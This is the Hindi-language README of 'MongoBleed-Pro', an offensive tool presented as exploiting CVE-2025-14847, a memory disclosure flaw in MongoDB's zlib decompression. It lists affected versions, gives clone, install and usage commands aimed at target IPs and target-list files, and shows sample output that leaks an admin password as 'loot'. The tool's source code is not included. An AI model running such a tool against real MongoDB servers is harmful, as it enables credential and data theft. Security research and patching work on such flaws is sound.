
MongoDB के zlib कंप्रेशन हैंडलिंग में एक महत्वपूर्ण मेमोरी डिस्क्लोज़र भेद्यता। यह टूल सुरक्षा शोधकर्ताओं को कमजोर MongoDB इंस्टेंस से संवेदनशील डेटा निकालने की अनुमति देता है।
उन्नत MongoDB मेमोरी लीक शोषण उपकरण
सीखते रहें | हैक करते रहें CyberTechAjju के साथ
MongoBleed-Pro CVE-2025-14847 के लिए एक उन्नत शोषण उपकरण है, जो MongoDB के zlib संपीड़न प्रबंधन में एक गंभीर मेमोरी प्रकटीकरण भेद्यता है। यह उपकरण सुरक्षा शोधकर्ताओं को कमजोर MongoDB इंस्टेंस से संवेदनशील डेटा निकालने की अनुमति देता है।
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच गैरकानूनी है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।
| गुण | विवरण |
|---|---|
| CVE ID | CVE-2025-14847 |
| भेद्यता प्रकार | मेमोरी प्रकटीकरण |
| प्रभावित संस्करण | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| मूल कारण | zlib डीकंप्रेसन में बफर ओवर-रीड |
| प्रभाव | अप्रमाणित दूरस्थ मेमोरी लीक |
# Clone the repository
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# Install dependencies
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
╔══════════════════════════════════════════════════════════════╗
║ 💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ Target Acquired: 192.168.1.100:27017
✓ Port OPEN
☠️ VULNERABLE! Initiating attack...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ LOOT ACQUIRED: 🔐 Password
→ admin_pass=SuperSecret123
╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║ 💾 Bytes Extracted: 125,847
║ 📦 Unique Fragments: 342
║ 🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝
| फ़ाइल | विवरण |
|---|---|
loot_<host>.txt | पढ़ने योग्य प्रारूप में निकाले गए रहस्य |
dump_<host>.bin | मैन्युअल विश्लेषण के लिए कच्चा मेमोरी डंप |
यदि आप MongoDB प्रशासक हैं, तो पैच किए गए संस्करणों में अपडेट करें:
CyberTechAjju
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
यदि आपको यह उपकरण उपयोगी लगा, तो कृपया इसे GitHub पर ⭐ दें!
「 सीखते रहें | हैक करते रहें 」
❤️ के साथ CyberTechAjju द्वारा बनाया गया
| आर्गुमेंट | विवरण | डिफ़ॉल्ट |
|---|
--target | लक्ष्य IP/URL | इंटरैक्टिव प्रॉम्प्ट |
--file | लक्ष्य सूची वाली फ़ाइल | कोई नहीं |
--threads | थ्रेड्स की संख्या | 50 |
--min-offset | न्यूनतम मेमोरी ऑफ़सेट | 20 |
--max-offset | अधिकतम मेमोरी ऑफ़सेट | 8192 |